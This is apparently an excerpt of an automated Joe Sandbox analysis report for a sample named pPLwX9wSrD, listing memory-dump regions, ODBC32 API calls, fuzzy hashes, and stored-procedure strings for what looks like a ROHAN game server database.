                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ConsignAddMoney] (?,?)}
                                                                                      • API String ID: 0-2384174568
                                                                                      • Opcode ID: 6b9a32811374aebc5d3cb85a7265370beae59c58e70f58e1ba03cea6d5ccd8bf
                                                                                      • Instruction ID: 7233474191123497f7eaad9b5b66233fb6fb5cba12b7890578e8269e5066ea5f
                                                                                      • Opcode Fuzzy Hash: 6b9a32811374aebc5d3cb85a7265370beae59c58e70f58e1ba03cea6d5ccd8bf
                                                                                      • Instruction Fuzzy Hash: 8A2112B0E8C214ABEB60CF64CC55F997374EB84754F208289F62C6A2C0D67979808F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_GetGuildWar](?, ?)},000000FD), ref: 0042DB28
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042DB67
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042DB9C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042DBD4
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_GetGuildWar](?, ?)}, xrefs: 0042DB1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_GetGuildWar](?, ?)}
                                                                                      • API String ID: 0-753609030
                                                                                      • Opcode ID: 08346d0fdd575ad2eb1f6222ea6916d76f1bfeea9fc8ebac1a1b2590b8a44913
                                                                                      • Instruction ID: 5f5e3d20c1a61a78fea5910b67b3c3c8b31c25310806eea13737cda41ea9cd7f
                                                                                      • Opcode Fuzzy Hash: 08346d0fdd575ad2eb1f6222ea6916d76f1bfeea9fc8ebac1a1b2590b8a44913
                                                                                      • Instruction Fuzzy Hash: 0F21F7B1640A546BEB64CF48CC62FAB7374EB4471AF208189F7147E2C4D5B56D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetAnonymousMode] (?,?)},000000FD), ref: 00432AB1
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00432AF0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00432B25
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432B5D
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetAnonymousMode] (?,?)}, xrefs: 00432AA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetAnonymousMode] (?,?)}
                                                                                      • API String ID: 0-557199333
                                                                                      • Opcode ID: aeeabe871129f7254a44d540f59532a2a25f71ff3ee4d703221c979b9c16c23e
                                                                                      • Instruction ID: ee60a5b0119dbebf41625cb838c2acea06801406cb3dd29aaed821feb7aa738d
                                                                                      • Opcode Fuzzy Hash: aeeabe871129f7254a44d540f59532a2a25f71ff3ee4d703221c979b9c16c23e
                                                                                      • Instruction Fuzzy Hash: B32156B0641656ABFB61CF45CC42FBA7374EBC4719F204289F6146E2C2D6756D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_StartGame](?,?) } ,000000FD), ref: 00427B79
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00427BB8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00427BED
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00427C25
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_StartGame](?,?) } , xrefs: 00427B70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_StartGame](?,?) }
                                                                                      • API String ID: 0-1915316637
                                                                                      • Opcode ID: 2ca836d1b87029e1b3147fbbf1ee7c1e84d016630832137f7b93dca99391de9d
                                                                                      • Instruction ID: 4a2e378c26e809b9429be399863f197d985292641de0c6bd143da068c9ac001a
                                                                                      • Opcode Fuzzy Hash: 2ca836d1b87029e1b3147fbbf1ee7c1e84d016630832137f7b93dca99391de9d
                                                                                      • Instruction Fuzzy Hash: 6C2121B4A45219ABEFA0CF44CC56F9A7374EB44714F60C389F6186B2D0DEB16D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetAnonymousMode] (?,?)},000000FD), ref: 00432B90
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00432BCF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00432C04
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432C3C
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetAnonymousMode] (?,?)}, xrefs: 00432B87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetAnonymousMode] (?,?)}
                                                                                      • API String ID: 0-928763527
                                                                                      • Opcode ID: 92c87c45c37456f6d507935e6698b26bb35d2c2f6c9cca1591192b56e48a84de
                                                                                      • Instruction ID: 5333a81139fd6970e20f2f169e9b8add6e79ec11c09a45b3576e1e1327f65612
                                                                                      • Opcode Fuzzy Hash: 92c87c45c37456f6d507935e6698b26bb35d2c2f6c9cca1591192b56e48a84de
                                                                                      • Instruction Fuzzy Hash: F921FFB0A45319ABFB24CF84CC52FAA7374EB84714F204289F6197A2C6D6B26D40CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetGuildWarRecord](?, ?)},000000FD), ref: 0042DC07
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042DC46
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042DC7B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042DCB3
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetGuildWarRecord](?, ?)}, xrefs: 0042DBFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetGuildWarRecord](?, ?)}
                                                                                      • API String ID: 0-4148307812
                                                                                      • Opcode ID: 2c5733c778a1db9ff846fb8a3f2f21acc11099c66484a794eeb1830c6b9a15aa
                                                                                      • Instruction ID: a02791c45d8dfb7aed6e2d89cd2b4dd0fe969fcd9fb470b9c9fb29b408af53c5
                                                                                      • Opcode Fuzzy Hash: 2c5733c778a1db9ff846fb8a3f2f21acc11099c66484a794eeb1830c6b9a15aa
                                                                                      • Instruction Fuzzy Hash: 552124B0A40614ABEB20CF44CC42FAB7374EB44715F608289F7186F2C4D6B26D81CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SetMercenaryReward](?,?)},000000FD), ref: 0043E11F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E161
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043E196
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043E1CE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SetMercenaryReward](?,?)}, xrefs: 0043E116
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SetMercenaryReward](?,?)}
                                                                                      • API String ID: 0-3885320788
                                                                                      • Opcode ID: c7cd3a2d279de3760e2dcde0afef2ecfcc18f79beefd57b6613606fd627b3160
                                                                                      • Instruction ID: 4dae91dc118172c8833f1fe20381f73b5c549d43aaa047a6a09d528ac45170cd
                                                                                      • Opcode Fuzzy Hash: c7cd3a2d279de3760e2dcde0afef2ecfcc18f79beefd57b6613606fd627b3160
